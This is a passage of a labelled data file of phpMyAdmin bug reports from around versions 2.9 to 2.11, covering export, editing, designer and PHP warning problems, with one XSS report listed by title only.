tested a few times, error is reproducible table has an int 11)[autoincrement] and two varchar 100) fields System Gentoo linux MySQL Client Version 5.0.26 PHP 5.2.1 pl3 gentoo Original URL https sourceforge.net p phpmyadmin bugs 2393 https sourceforge.net p phpmyadmin bugs 2393 Original author psycho 3d Found in version 2.10.0.2","bug"
"24444","8760","Edit next row.
Does not work.
The next primary key is not passed to tbl change.php.
Original URL https sourceforge.net p phpmyadmin bugs 2394 https sourceforge.net p phpmyadmin bugs 2394 Original author lem9 Found in version 2.10.0.2","bug"
"24444","8761","Edit display blank page.
When I m trying to edit a special post in the database it only diplays a blank page.
This does not happen to all kind of posts but the ones who is affected never diplays the information.
It s only posts in one category that is affected.
I ve tried to edit the posts on multiple computers, using IE, Firefox and Opera but it won t work.
But when I contact the support crew at my webhotel but they have no problem.
Original URL https sourceforge.net p phpmyadmin bugs 2400 https sourceforge.net p phpmyadmin bugs 2400 Original author starjd Found in version 2.9.2","bug"
"24444","8762","Export file even if file not selected.
In the config file I have set the default compression to bzip2.
cfg[ Export ][ compression ] = bzip2 ; While exporting a database or table and the file checkbox is unchecked, the dialog for file download appears anyway.
This is when the compression radio button is in any of the compressions.
When I have the selection for none , the export page works as expexted, thus file is not created.
Original URL https sourceforge.net p phpmyadmin bugs 2395 https sourceforge.net p phpmyadmin bugs 2395 Original author paazio Found in version 2.10.0.2","bug"
"24444","8763","Undefined index history w2k).
just after the latest changes rev.10194) when i try and browse a lately edited table i get Notice Undefined index history in D \HTdocs\PmaTrunkSvn\libraries\relation.lib.php on line 769 Error SQL Befehl INSERT INTO .
lt; HERE SOMETHING IS MISSING ;) `username` , `db` , `table` , `timevalue` , `sqlquery` ) VALUES root , abc , wp categorylinks , NOW ) , SELECT FROM `wp categorylinks` ) MySQL meldet 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near `username`, `db`, `table`, ` at line 3 using w2k,php 5.2.1 on two different boxes!
can t reproduce on pma.cihar.com trunk config Original URL https sourceforge.net p phpmyadmin bugs 2398 https sourceforge.net p phpmyadmin bugs 2398 Original author windkiel Found in version Latest Git","bug"
"24444","8764","Wrong export of binary character fields.
For example, a latin1 bin VARCHAR gets exported with hex representation, but when this is imported back, the data is corrupted.
I have the start of a solution.
In my test, the generated file is insert into t1 values 0xc3a9636f6c65); but this format works insert into t1 values convert 0xc3a9636f6c65 using utf8)); Original URL https sourceforge.net p phpmyadmin bugs 2399 https sourceforge.net p phpmyadmin bugs 2399 Original author lem9 Found in version 2.10.0.2","bug"
"24444","8765","unnecessary innodb hint when browsing myisam tables.
when i browse my myisam tables i get the annoying innodb hint May be approximate.
See FAQ 3.11 Original URL https sourceforge.net p phpmyadmin bugs 2401 https sourceforge.net p phpmyadmin bugs 2401 Original author windkiel Found in version Latest Git","bug"
"24444","8766","headers already sent error if OBGzip = 0. if cfg[ OBGzip ] = false; or using IE6 where OBGzip is disabled for some historical reasons if cfg[ OBGzip ] = auto , which is default) i get the following PHP Warning Cannot modify header information headers already sent by output started at D \HTdocs\PmaTrunkSvn\libraries\header meta style.inc.php 33) in D \HTdocs\PmaTrunkSvn\libraries\ob.lib.php on line 63 with the following tiny modification the the header is only sent if OBGzip = 1 and the warning doesn t show up of course) if mode == 1) header X ob mode .
mode); or header X ob mode .
mode); moved into the last else block) Original URL https sourceforge.net p phpmyadmin bugs 2402 https sourceforge.net p phpmyadmin bugs 2402 Original author windkiel Found in version Latest Git","bug"
"24444","8767","Print View Null Values ignored.
If you want print the table details http xyz.net tbl printview.php?lang=de utf 8 server=4 collation connection=utf8 general ci db=db test table=einstellungen goto=tbl properties structure.php back=tbl properties structure.php) the NULL values are not correctly shown allways yes !!
I use an MySQL Version 5.0.27 community max nt and the phpMyAdmin 2.7.0 pl2 Original URL https sourceforge.net p phpmyadmin bugs 2403 https sourceforge.net p phpmyadmin bugs 2403 Original author jmjacob Found in version 2.7.0 pl2","bug"
"24444","8768","Blobs being cleared on Edit of row.
Apache 2.0.52 CentOS) PHP Version 5.2.1 MySQL 5.0.22 When editing a row which contains longblob fields, they are cleared.
Rather than being left as they were.
This behaviour is difference to phpmyadmin version 2.9.0.1 We have a table containing 3 fields id INT 10) unsigned auto inc, title VARCHAR 64), image LONGBLOB) This has been populated from a php script on our website.
If we edit a title using phpmyadmin 2.10.0.2, then the blob gets cleared to 0b.
The SQL appears to be UPDATE tbl SET title= newtitle , image= WHERE id=1.
When in 2.9.0.1 it would have not included the image= in the query.
Original URL https sourceforge.net p phpmyadmin bugs 2404 https sourceforge.net p phpmyadmin bugs 2404 Original author jnpritch Found in version 2.10.0.2","bug"
"24444","8769","Can t edit if BLOB and no PK.
The generated condition contains only the left part of the comparison AND CONVERT `audios`.`audio` USING utf8 ) ; Original URL https sourceforge.net p phpmyadmin bugs 2405 https sourceforge.net p phpmyadmin bugs 2405 Original author lem9 Found in version 2.10.0.2","bug"
"24444","8770","Fatal Error after saving dump on a webserver folder.
pma 2.9, 2.10, trunk after saving an export dump on a webserver folder cfg[ SaveDir ] = .. exports ) apache 2.2 pha 5.2.1 grabs all the memory and crashes .
pma 2.8.2 is the latest working version using the latest xampp).
Original URL https sourceforge.net p phpmyadmin bugs 2406 https sourceforge.net p phpmyadmin bugs 2406 Original author windkiel Found in version Latest Git","bug"
"24444","8771","server select box on main page instead of login page trunk).
something not proper initialized?
lt;?php cfg[ blowfish secret ] = quodlibet70401 ; i = 0; i ; cfg[ Servers ][ i][ auth type ] = cookie ; ?
gt; brings up the server select box different from previous behaviour and in contrast to the docs).
Original URL https sourceforge.net p phpmyadmin bugs 2407 https sourceforge.net p phpmyadmin bugs 2407 Original author windkiel Found in version Latest Git","bug"
"24444","8772","undefined function ctype digit ).
PHP Fatal error Call to undefined function ctype digit ) this appear after fresh install system info php5 5.2.0 Original URL https sourceforge.net p phpmyadmin bugs 2408 https sourceforge.net p phpmyadmin bugs 2408 Original author fitless84 Found in version 2.10.0.2","bug"
"24444","8773","undefined function ctype digit ).
PHP Fatal error Call to undefined function ctype digit ) this appear after fresh install system info php5 5.2.0 Original URL https sourceforge.net p phpmyadmin bugs 2409 https sourceforge.net p phpmyadmin bugs 2409 Original author fitless84 Found in version 2.10.0.2","bug"
"24444","8774","Wrong total nr of records displayed when browsing data.
When browsing data in a table Phpmyadmin shows an information box, containing the currently displayed records, the total amount and the query duration e.g.
[Showing rows 0 29 55,653 total, Query took 0.0001 sec)] the total nr of records rows displayed is incorrect.
I know that this table has 55452 rows, but this only correctly displayed on the last data page.
a few examples of what phpmyadmin shows all on the same table follow below Showing rows 0 29 55,653 total, Query took 0.0001 sec) Showing rows 5000 5029 55,679 total, Query took 0.0062 sec) Showing rows 40533 40562 52,261 total, Query took 0.0519 sec) Showing rows 55440 55451 55,452 total, Query took 0.0002 sec) The mysql version = 5.0.24a on ubuntu 6.10, the phpmyadmin version = 2.10.0.2 on Apache 2.0.55 PHP 5.1.6 the phpmyadmin was installed from a source tarball, the other aps from the repository This error has been observed by me using opera 9.10 under ubuntu 6.10 winxp and firefox 2.0.0.3 also using ubuntu 6.10 and winxp below follows my table layout | mouse temp 1 | CREATE TABLE `mouse temp 1` `mouse id` int 11) NOT NULL, `time` time NOT NULL, `date` date NOT NULL, `search` varchar 10) collate utf8 unicode ci NOT NULL, `temp` decimal 5,3) default NULL, `act` int 11) default NULL, `exp day` int 11) NOT NULL, `exp daymin` int 11) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci | Original URL https sourceforge.net p phpmyadmin bugs 2410 https sourceforge.net p phpmyadmin bugs 2410 Original author paraiko Found in version 2.10.0.2","bug"
"24444","8775","Cause of data manipulation issues.
I ran into some data manipulation issues simular as to the ones mentioned at http sourceforge.net forum forum.php?thread id=1712782 forum id=72909 I did some investigation and found that indeed this is an issue with POST data not getting thru ok, but it s not solely a PHP issue.
The problem is more that the name attributes of the form fields are overly verbose since it contains an unserialized representation of the unique key of the field, for instance lt;input type= text name= fields[multi edit][`documents`.`id` = 1 AND `documents`.`page` = 1][id] gt; Now this example won t cause any problems, but imagine what happens when you want to edit a record of a table that doesn t have a primary or unique key defined.
In that case the unique key will be made out of all fields in the record and it s contents!
That can lead to name attributes of several kilobytes or possibly even megabytes long depending on the data in the record.
You are easily hitting restrictions there.
A better approach to prevent this verbosity, and since you already are defining the key in a seperate hidden field, would be to use some other unique identifier to group these fields, for instance lt;input type= hidden name= primary key[1] value= `documents`.`id` = 1 AND `documents`.`page` = 1 gt; lt;input type= text name= fields[multi edit][1][id] gt; where [1] is a simple counter that can be increased for each record Original URL https sourceforge.net p phpmyadmin bugs 2411 https sourceforge.net p phpmyadmin bugs 2411 Original author crisp Found in version 2.10.0.2","bug"
"24444","8776","Visual space bug in table name in browser).
Visual space bug in table name If we creating table sometable and sometable without , of course).
In browser we see first creation) sometable second creation) sometable .
It is not critical bug.
But it misleads.
I ask fixed this bug.
Original URL https sourceforge.net p phpmyadmin bugs 2412 https sourceforge.net p phpmyadmin bugs 2412 Original author allexx Found in version 2.7.0","bug"
"24444","8777","Designer PDF export on multi server.
I ve a config.inc.php for 2 server on my localhost MySQL 4.0.x and 5.0.x) this works so far fine.
The problem is the design mode... when I try to save or export I ll get logged out!
every time) So there is no chance to save or export.
Original URL https sourceforge.net p phpmyadmin bugs 2413 https sourceforge.net p phpmyadmin bugs 2413 Original author phpmyforum","bug"
"24444","8778","inserting data the 2 rows).
i dont know how to explain it but here goes.. i have the latest pma.
when i click on insert it has 2 rows to enter data the one has the checkbox ignore ).
if i enter 1 record then its all ok.. but if i fill in the second row aswell it gives errors.
it looks like it doesnt split the 2 records in the sql.. Error SQL query INSERT INTO `distribooker`.`db voucherreasons` `ID` , `voucher` , `ID` , `voucher` ) VALUES NULL , Employee Copies ), NULL , Proprietro Permanent File ) MySQL said 1136 Column count doesn t match value count at row 1 Original URL https sourceforge.net p phpmyadmin bugs 2415 https sourceforge.net p phpmyadmin bugs 2415 Original author williamstam Found in version 2.10.1 rc1","bug"
"24444","8779","undefined PMA getRelationsParam ) in server import.php.
on Michal s demo svn Trunk Rev.
10289 http pma.cihar.com trunk config index.php main page, click on import without selecting a db for importing a dump with create database ... and use ...) you get Fatal error Call to undefined function PMA getRelationsParam ) in srv http pma.cihar.com trunk config libraries import docsql.php on line 9 works very well in STABLE ) Original URL https sourceforge.net p phpmyadmin bugs 2414 https sourceforge.net p phpmyadmin bugs 2414 Original author windkiel Found in version Latest Git","bug"
"24444","8780","undefined index js frame in phpmyadmin.css.p.
sometimes i get PHP Notice Undefined index js frame in D \HTdocs\07PMA\PmaTrunkSvn\phpmyadmin.css.php on line 793 and also some ppl in IRC and in the help trk e.g.
https sourceforge.net forum message.php?msg id=4210686 complained about css not being loaded in the right frame.
So any if isset REQUEST[ js frame ])) is needed here and in pma 2.10 as well.
Original URL https sourceforge.net p phpmyadmin bugs 2416 https sourceforge.net p phpmyadmin bugs 2416 Original author windkiel Found in version Latest Git","bug"
"24444","8781","Trouble to CREATE TRIGGER with delimiter.
I can t create trigger in compound statement whe use phpmyadmin but use comman line prompt I don t have trouble.
Code to create trigger delimiter CREATE TRIGGER Capital bu BEFORE UPDATE ON Capital FOR EACH ROW BEGIN SET country = OLD.Country; SET capital old = OLD.Capital; SET capital new = NEW.Capital; END; delimiter; ERROR There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Unknown Punctuation String 11 STR SQL delimiter CREATE TRIGGER Capital bu2 BEFORE UPDATE ON Capital FOR EACH ROW BEGIN SET country = OLD.Country; SQL query delimiter CREATE TRIGGER Capital bu2 BEFORE UPDATE ON Capital FOR EACH ROW BEGIN SET country = OLD.Country; MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near delimiter CREATE TRIGGER Capital bu2 BEFORE UPDATE IN COMMAND PRONT LIN NO PROBLE IS ALL OK Original URL https sourceforge.net p phpmyadmin bugs 2418 https sourceforge.net p phpmyadmin bugs 2418 Original author hemmgt Found in version 2.9.2","bug"
"24444","8782","XSS in browse foreigners.php.
As reported by Security Reason.
Original URL https sourceforge.net p phpmyadmin bugs 2417 https sourceforge.net p phpmyadmin bugs 2417 Original author lem9 Found in version 2.10.0.2","bug"
"24444","8783","White Page if Limit is higher.
if some internal relationships are set and If i try this SELECT FROM dvd LIMIT 0, 300 or directly change MaxRows from 30 to 300 in config file, i receive a white page with only left menu visible.
same query from mysql console or my web pages has no problem.
Original URL https sourceforge.net p phpmyadmin bugs 2419 https sourceforge.net p phpmyadmin bugs 2419 Original author skonvols2k Found in version 2.9.2","bug"
"24444","8784","incorrect possible deep recursion attack .
A customer of ours has a fairly big table with lots of enums, like the one at the end of this text.
Whenever he tries to insert a row of any configuration) using phpMyAdmin, it dies with possible deep recursion attack The server is running MySQL 4.1.20 and PHP 4.4.6.
It seems this is a security feature of some kind that was added in this version, which might be tripped incorrectly.
If I can provide any further information to be more helpful, please let me know.
CREATE TABLE `inf servicios` `id inf servicios` int 10) unsigned NOT NULL auto increment, `inmueble idinmueble` int 10) unsigned NOT NULL default 0 , ` Detalles de la Propiedad` enum lt;img src= images click.gif gt; ) default NULL, `Area total mt2` int 2) default NULL, `Area edificada mt2` int 2) default NULL, `Muralla perimetral` enum lt;img src= images click.gif gt; ) default NULL, `Cercado perimetral` enum lt;img src= images click.gif gt; ) default NULL, `Vereda tipo` enum cemento , piedra , baldosas de canto rodado , baldosas de cemento , baldosa calcxc3xa1rea , tierra ) default NULL, `Fecha de construccion` int 4) default NULL, `Total de plantas` int 2) default NULL, `Total de dependencias` int 2) default NULL, `Total sanitarios` int 2) default NULL, `Conservacion del inmueble` enum malo , regular , bueno , muy bueno , excelente ) default NULL, ` Area Intima` enum lt;img src= images click.gif gt; ) NOT NULL default lt;img src= images click.gif gt; , `Dormitorios en suite` int 2) default NULL, `Dormitorios con placard` int 2) default NULL, `Total de dormitorios` int 2) default NULL, `Dormitorios con aacc` enum 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 , todos ) default NULL, `Dormitorios con calefaccion` enum 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 , todos ) default NULL, `Estar intimo` enum lt;img src= images click.gif gt; ) default NULL, ` Area Social` enum lt;img src= images click.gif gt; ) NOT NULL default lt;img src= images click.gif gt; , `Cuarto de estudio` enum lt;img src= images click.gif gt; ) default NULL, `Comedor social` enum lt;img src= images click.gif gt; ) default NULL, `Comedor diario` enum lt;img src= images click.gif gt; ) default NULL, `Estar diario` enum lt;img src= images click.gif gt; ) default NULL, `Estar comedor` enum lt;img src= images click.gif gt; ) default NULL, `Living` enum lt;img src= images click.gif gt; ) default NULL, `Escritorio` enum lt;img src= images click.gif gt; ) default NULL, `Galeria` enum lt;img src= images click.gif gt; ) default NULL, `Quincho` enum lt;img src= images click.gif gt; ) default NULL, ` Area de Servicio` enum lt;img src= images click.gif gt; ) default NULL, `Despensa` enum lt;img src= images click.gif gt; ) default NULL, `Cocina` enum lt;img src= images click.gif gt; ) default NULL, `Cuartos de servicio` enum lt;img src= images click.gif gt; ) default NULL, `Sanitario de servicio` enum lt;img src= images click.gif gt; ) default NULL, `Acceso de Servicio` enum lt;img src= images click.gif gt; ) default NULL, `Lavadero de ropa` enum lt;img src= images click.gif gt; ) default NULL, `Cuarto de deposito` enum lt;img src= images click.gif gt; ) default NULL, ` Area Recreativa` enum lt;img src= images click.gif gt; ) default NULL, `Cuarto de juegos` enum lt;img src= images click.gif gt; ) default NULL, `Biblioteca` enum lt;img src= images click.gif gt; ) default NULL, `Gimnasio` enum lt;img src= images click.gif gt; ) default NULL, `Piscina` enum lt;img src= images click.gif gt; ) default NULL, `Cancha de futbol` enum lt;img src= images click.gif gt; ) default NULL, `Cancha de tenis` enum lt;img src= images click.gif gt; ) default NULL, `Cancha de voley` enum lt;img src= images click.gif gt; ) default NULL, `Patio` enum grande , mediano , chico ) default NULL, ` Comodidades` enum lt;img src= images click.gif gt; ) default NULL, `Amoblado` enum lt;img src= images click.gif gt; ) default NULL, `Chimenea` enum lt;img src= images click.gif gt; ) default NULL, `Balcon terraza` enum lt;img src= images click.gif gt; ) default NULL, `Material de pisos` enum Ceramico , Granito , Alfombra , Parquet , Mosaicos , Marmol , Granito Cerxc3xa1mico Moquet , Vinxc3xadlico , Cemento , Cerxc3xa1mico Moquet , Granito Moquet ) default NULL, `Herrajes de lujo` enum lt;img src= images click.gif gt; ) default NULL, `Ascensor` enum lt;img src= images click.gif gt; ) default NULL, `Montacargas` enum lt;img src= images click.gif gt; ) default NULL, `Sauna` enum lt;img src= images click.gif gt; ) default NULL, `Hidromasaje` enum lt;img src= images click.gif gt; ) default NULL, `Barbacoa parrilla` enum lt;img src= images click.gif gt; ) default NULL, `Sistema de riego` enum lt;img src= images click.gif gt; ) default NULL, `Bodega de vinos` enum lt;img src= images click.gif gt; ) default NULL, `Porton electrico` enum lt;img src= images click.gif gt; ) default NULL, `Portero electrico` enum lt;img src= images click.gif gt; ) default NULL, `Video portero` enum lt;img src= images click.gif gt; ) default NULL, `Plazas de Garage` enum 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 ) default NULL, `Estacionamiento` enum lt;img src= images click.gif gt; ) default NULL, ` Infraestructura Servicios` enum lt;img src= images click.gif gt; ) default NULL, `Energia electrica` enum lt;img src= images click.gif gt; ) default NULL, `Generador de emergencia` enum lt;img src= images click.gif gt; ) default NULL, `Alumbrado publico` enum lt;img src= images click.gif gt; ) default NULL, `Agua corriente` enum lt;img src= images click.gif gt; ) default NULL, `Pozo artesiano` enum lt;img src= images click.gif gt; ) default NULL, `Linea telefonica` enum lt;img src= images click.gif gt; ) default NULL, `TV cable` enum lt;img src= images click.gif gt; ) default NULL, `Internet` enum lt;img src= images click.gif gt; ) default NULL, `Desague pluvial` enum lt;img src= images click.gif gt; ) default NULL, `Desague cloacal` enum lt;img src= images click.gif gt; ) default NULL, `Pozo ciego` enum lt;img src= images click.gif gt; ) default NULL, `Camara septica` enum lt;img src= images click.gif gt; ) default NULL, `Aberturas de blindex` enum lt;img src= images click.gif gt; ) default NULL, ` Seguridad` enum lt;img src= images click.gif gt; ) default NULL, `Puertas blindadas` enum lt;img src= images click.gif gt; ) default NULL, `Sistema de alarma` enum lt;img src= images click.gif gt; ) default NULL, `Guardia privada` enum lt;img src= images click.gif gt; ) default NULL, `Circuito cerrado video` enum lt;img src= images click.gif gt; ) default NULL, `Sistema contra incendios` enum lt;img src= images click.gif gt; ) default NULL, `Escalera de incendios` enum lt;img src= images click.gif gt; ) default NULL, `Disyuntor electrico` enum lt;img src= images click.gif gt; ) default NULL, `Salida de emergencia` enum lt;img src= images click.gif gt; ) default NULL, ` Extra Info` enum lt;img src= images click.gif gt; ) default NULL, `Aislacion termica` enum lt;img src= images click.gif gt; ) default NULL, `Aislacion acustica` enum lt;img src= images click.gif gt; ) default NULL, `Aislacion hidrofuga` enum lt;img src= images click.gif gt; ) default NULL, `Aire acondicionado central` enum lt;img src= images click.gif gt; ) default NULL, `Calefaccion central` enum lt;img src= images click.gif gt; ) default NULL, PRIMARY KEY `id inf servicios`), KEY `inf servicios FKIndex1` `inmueble idinmueble`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=1 ; Original URL https sourceforge.net p phpmyadmin bugs 2420 https sourceforge.net p phpmyadmin bugs 2420 Original author kstange Found in version 2.10.0.2","bug"
"24444","8785","space after COUNT breaks Export but not Query.
This was discovered by a friend of mine in the lab who s new to SQL.
He wrote SELECT COUNT ) FROM some table ... notice the space between COUNT and the parens.
phpMyAdmin deals with this just fine, even though e.g.
the command line MySQL interface complains.
I suspect that the pretty printer corrects this SQL before it s sent to the database.
If, however, you try to export the results to a file, you get an error message apparently the original, un sanitized SQL is sent directly to the database in this case.
This is a problem in general because it means that the in browser results of a query may not match the results downloaded to a file.
I believe that the same SQL should always be used for display results vs. export results.
I don t care much whether this particular statement succeeds or fails, just that phpMyAdmin handles it consistently.
This bug has been verified with several recent 2.8.x, 2.10.x) versions, including the public demo server 2.11.0 dev, I believe).
It occurs on the most recent versions of Safari and Firefox on OS X, and has been verified for both CSV and SQL export presumably affects all types, however).
Original URL https sourceforge.net p phpmyadmin bugs 2421 https sourceforge.net p phpmyadmin bugs 2421 Original author ian davis Found in version 2.11.3","bug"
"24444","8786","gmp pow ) Negative Exponent not supported.
Every time I click Status Runtime information), my error log fills up with 53K of this [02 May 2007 13 11 28] PHP Warning gmp pow ) [ lt;a href= function.gmp pow gt;function.gmp pow lt; a gt;] Negative exponent not supported in var www web1 web phpMyAdmin 2.10.1 all languages libraries common.lib.php on line 495 Thanks, Mark Original URL https sourceforge.net p phpmyadmin bugs 2422 https sourceforge.net p phpmyadmin bugs 2422 Original author mark pmw Found in version 2.10.1","bug"
"24444","8787","deleting records freezes.
when i try to delete records the page has the loading thing going but it eventualy times out.. yet the records are deleted.
at the moment to delete records i click delete then yes then click on the table name on the left bar.
the records get deleted but the page somehow doesnt go back to the default.
looks like a never ending loop.
once again i think this is caused by the fact that i use cfg[ DefaultTabTable ] = sql.php ; it probably tried to run the last sql issued again.. and since the last sql was the delete it tries to run that yet the records were already deleted and so goes into the whole loop thing im using the latest PMA 2.10.1 yet this bug has been in PMA for a while already.
Original URL https sourceforge.net p phpmyadmin bugs 2423 https sourceforge.net p phpmyadmin bugs 2423 Original author williamstam Found in version 2.10.1","bug"
"24444","8788","Inserted Row Count is wrong.
Hi, After a row is inserted, the row count is wrong.
It s 2 or 3, while I only inserted a single row.
Original URL https sourceforge.net p phpmyadmin bugs 2424 https sourceforge.net p phpmyadmin bugs 2424 Original author olafvdspek Found in version 2.10.1","bug"
"24444","8789","export in SQL format includes all Procedures.
When you export a table or a query) in SQL format, all the Stored Procedures and Stored Functions of the same database are included in the result.
I found no checkbox or configuration switch to avoid this.
I get this error with phpMyAdmin 2.9.1.1 on MySQL 5.0.27 and with phpMyAdmin 2.10.1 on MySQL 5.0.38.
How to produce select a table or run a query click on Export Button choose SQL as the format keep any other options as defaults enable the last option save as file click on Go button Result the file includes behind the data all the Stored Procedures and Stored Functions of the same database.
This is irritating and a little dangerous, because if somebody imports this file, all of his Stored Procedures and Stored Functions will be mixed or replaced by the versions in the file.
Original URL https sourceforge.net p phpmyadmin bugs 2425 https sourceforge.net p phpmyadmin bugs 2425 Original author hartmutg Found in version 2.10.1","bug"
"24444","8790","Cannot update record where TEXT field contains newlines.
I reported this as a comment to item 1712350, but I ll raise a new item to avoid muddling the two.
Using phpMyAdmin 2.10.1 and 2.10.0.2, I cannot use the Edit facility to update any field in a record that includes a MEDIUMTEXT field containing a newline character.
No error is reported it simply returns to the browse screen.
It fails with all browsers I ve tried and on servers running both PHP 4 and PHP 5.
I enclose a dump of the table I was using.
I was simply trying to change the value of field cb cat in the second row.
It works with phpMyAdmin 2.9.2, and I can t reproduce it on the demo server at http pma.cihar.com STABLE index.php?db=test.
When using either of these, the successful SQL was as follows UPDATE `cb public3` SET `cb cat` = 31 WHERE `cb public3`.`id` =2 AND CONVERT `cb public3`.`cb cat` USING utf8 ) = 30 AND CONVERT `cb public3`.`cb title` USING utf8 ) = Line 1\r\nline 2 LIMIT 1 Original URL https sourceforge.net p phpmyadmin bugs 2426 https sourceforge.net p phpmyadmin bugs 2426 Original author jacklevy Found in version 2.10.1","bug"
"24444","8791","Error, while updating text column data.
I updated about 10KB of text in column, named val.
Its type is text.
Then I received PHP error Warning Invalid argument supplied for foreach ) in phpMyAdmin 2.10.1\tbl replace.php on line 209 Warning Cannot modify header information headers already sent by output started at phpMyAdmin 2.10.1\tbl replace.php 209) in phpMyAdmin 2.10.1\libraries\ob.lib.php on line 64 Warning Cannot modify header information headers already sent by output started at phpMyAdmin 2.10.1\tbl replace.php 209) in phpMyAdmin 2.10.1\libraries\header http.inc.php on line 13 Warning Cannot modify header information headers already sent by output started at phpMyAdmin 2.10.1\tbl replace.php 209) in phpMyAdmin 2.10.1\libraries\header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at phpMyAdmin 2.10.1\tbl replace.php 209) in phpMyAdmin 2.10.1\libraries\header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at phpMyAdmin 2.10.1\tbl replace.php 209) in phpMyAdmin 2.10.1\libraries\header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at phpMyAdmin 2.10.1\tbl replace.php 209) in phpMyAdmin 2.10.1\libraries\header http.inc.php on line 19 In the text weren t any special chars.
There were only quotes.
Thanks for help.
Original URL https sourceforge.net p phpmyadmin bugs 2427 https sourceforge.net p phpmyadmin bugs 2427 Original author kyselejsyrecek Found in version 2.10.1","bug"
"24444","8792","Missing header when deleting a checked column.
Report from Michael Keck.
Suggested patch in tbl structure.php err url = tbl structure.php?
.
PMA generate common url db, table); \ require once .
libraries header.inc.php ); \ require once .
libraries tbl links.inc.php ; require .
libraries mult submits.inc.php ; Original URL https sourceforge.net p phpmyadmin bugs 2428 https sourceforge.net p phpmyadmin bugs 2428 Original author lem9 Found in version 2.10.1","bug"
"24444","8793","Warning on query page when tablelist is empty.
When no tables are in a selected database and you go to the the query page you will get this php warning Warning Invalid argument supplied for foreach ) in ... phpMyAdmin 2.10.1 all languages db qbe.php on line 624 Original URL https sourceforge.net p phpmyadmin bugs 2429 https sourceforge.net p phpmyadmin bugs 2429 Original author x coder Found in version 2.10.1","bug"
"24444","8794","A little error on Export page pdf).
On Export page select PDF and look at the appeared header of the Options fieldset, there is strOptions now.
libraries export pdf.php, line 23 options text = gt; strOptions , Change to options text = gt; strPDFOptions , Original URL https sourceforge.net p phpmyadmin bugs 2430 https sourceforge.net p phpmyadmin bugs 2430 Original author hanut Found in version 2.10.1","bug"
"24444","8795","Multi server setup breaks designer.
I have a pretty simple multi server phpMyAdmin install.
When I use the Designer on a database on the remote server and save the coords, they get saved to the local or default) pma table pma designer coords ).
When I reload the designer view, the saved coords are not reflected, the tables are not laid out as I saved them.
If I copy the local pma designer coords contents to the pma table on the remote server from the local server, the layouts are shown.
My assumption is that storing pma data for the remote server in the local pma store is a bug since there is no server column to uniquely identify the table named in pma designer coords and having a table of the same name on both servers would cause coords to keep getting traded back and forth.
I would guess pmd save pos.php is writing in the wrong place?
Original URL https sourceforge.net p phpmyadmin bugs 2431 https sourceforge.net p phpmyadmin bugs 2431 Original author ckjackson Found in version 2.10.1","bug"
"24444","8796","submit [Browse] FROM `db name` instead of .... after an insert error Error SQL query Edit INSERT INTO `test`.`hiwi` `hKurz` ,`hSID` ,`hLang` ,`hVon` ,`hBis` ) VALUES tt , 1 , tester , 0000 00 00 00 00 00 , 0000 00 00 00 00 00 ) MySQL said 1062 Duplicate entry 1 for key 2 [Browse] when I click [Browse] to edit the faulty SQL I get Error SQL query SELECT FROM `test` WHERE CONCAT WS , `hKurz` , `hSID` , `hLang` , `hVon` , `hBis` ) = 1 ORDER BY `hKurz` , `hSID` , `hLang` , `hVon` , `hBis` LIMIT 0 , 30 MySQL said 1054 Unknown column hKurz in where clause tested on http pma.cihar.com trunk config index.php?db=test Original URL https sourceforge.net p phpmyadmin bugs 2432 https sourceforge.net p phpmyadmin bugs 2432 Original author windkiel Found in version Latest Git","bug"
"24444","8797","Browse Full Partial Texts not working.
dontlimitchars is not evaluated changed when I click on lt; T gt; Original URL https sourceforge.net p phpmyadmin bugs 2433 https sourceforge.net p phpmyadmin bugs 2433 Original author windkiel Found in version Latest Git","bug"
"24444","8798","openCalendar ...) with the current time.
Hello If I open the calender javascript openCalendar token=7c50919efdd126bb7c82921892ea61be , insertForm , field 11 3 , datetime ) only the current date is selected and the time is 00 00 00 on DateTime columns with 0000 00 00 00 00 00).
Please set the time to the current time.
In Firefox the OK Button is cuted .
I use STRG to reduce the size to see the Button complete.
Original URL https sourceforge.net p phpmyadmin bugs 2434 https sourceforge.net p phpmyadmin bugs 2434 Original author misterx1980","bug"
"24444","8799","in db names cause trouble with JS eventhandlers.
server databases.php and navigation.php can t handle db names containing quotes.
Altough not recommended, e.g., `CopyOf test ` is a legal database name since it is allowed in foldernames.
Original URL https sourceforge.net p phpmyadmin bugs 2435 https sourceforge.net p phpmyadmin bugs 2435 Original author windkiel Found in version 2.10.1","bug"
"24444","8800","db rename > undefined cfgRelation.
From the forum for the developers http secretspystuff.blogspot.com 2007 05 phpmyadmin notice on db rename.html the image at the URL shows the xdebug error i received after creating, then renaming a database on Apache2 php5 winxp From Juergen Wind pma 2.10.1 and trunk version Id Table.class.php 10333 2007 04 30 16 35 51Z lem9 line 477 if GLOBALS[ cfgRelation ][ work]) \{ needs to be changed to \ if isset GLOBALS[ cfgRelation ]) GLOBALS[ cfgRelation ][ work]) \{ Original URL https sourceforge.net p phpmyadmin bugs 2436 https sourceforge.net p phpmyadmin bugs 2436 Original author lem9","bug"
"24444","8801","CREATE database privilege not always detected.
In some circumstances, phpMyAdmin incorrectly determines that the logged in user does not have privileges to create databases.
Steps to reproduce 1\.
Create a new user example ) with no privileges 2\.
Log in as this user and verify that Create Table shows a No Privileges warning.
3\.
Grant the user permission to create tables GRANT CREATE ON .
to example ; 4\.
In the browser, hit refresh.
Verify that the No Privileges warning no longer appears.
5\.
Now grant the user permission to drop tables GRANT DROP ON .
to example ; 6\.
In the browser, hit refresh.
What happens?
After adding the DROP privilege, suddenly the No Privileges warning shows up under Create Database again.
Original URL https sourceforge.net p phpmyadmin bugs 2437 https sourceforge.net p phpmyadmin bugs 2437 Original author coulson Found in version 2.10.1","bug"
"24444","8802","DROP TABLE in export view structure.
